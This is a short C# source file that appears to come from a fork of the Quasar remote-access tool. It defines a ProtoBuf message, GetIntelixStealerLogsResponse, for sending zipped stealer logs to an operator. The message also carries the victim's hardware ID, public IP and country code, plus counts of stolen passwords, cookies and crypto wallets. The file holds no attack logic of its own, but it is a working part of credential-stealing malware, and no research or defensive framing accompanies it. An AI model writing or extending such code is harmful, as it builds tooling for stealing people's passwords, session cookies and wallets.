using ProtoBuf;

namespace Quasar.Common.Messages
{
    [ProtoContract]
    public class GetIntelixStealerLogsResponse : IMessage
    {
        [ProtoMember(1)]
        public byte[] ZipData { get; set; }

        [ProtoMember(2)]
        public string Hwid { get; set; }

        [ProtoMember(3)]
        public string PublicIp { get; set; }

        [ProtoMember(4)]
        public string CountryCode { get; set; }

        [ProtoMember(5)]
        public long PasswordCount { get; set; }

        [ProtoMember(6)]
        public long CookieCount { get; set; }

        [ProtoMember(7)]
        public int WalletCount { get; set; }

        [ProtoMember(8)]
        public bool Success { get; set; }

        [ProtoMember(9)]
        public string ErrorMessage { get; set; }
    }
}
